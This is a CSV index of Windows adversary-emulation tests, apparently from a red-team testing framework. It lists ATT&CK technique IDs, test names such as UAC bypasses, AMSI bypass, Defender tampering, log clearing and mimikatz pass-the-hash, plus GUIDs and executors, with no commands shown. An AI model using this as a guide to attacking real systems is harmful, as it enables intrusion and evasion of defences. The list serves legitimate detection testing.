privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
privilege-escalation,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
defense-evasion,T1070.003,Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
defense-evasion,T1070.004,File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
defense-evasion,T1218.004,InstallUtil,4,InstallUtil Install method call,9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b,powershell
defense-evasion,T1218.004,InstallUtil,5,InstallUtil Uninstall method call - /U variant,34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b,powershell
defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-ed3c-4d4c-a9ee-15e44d1560d1,powershell
defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
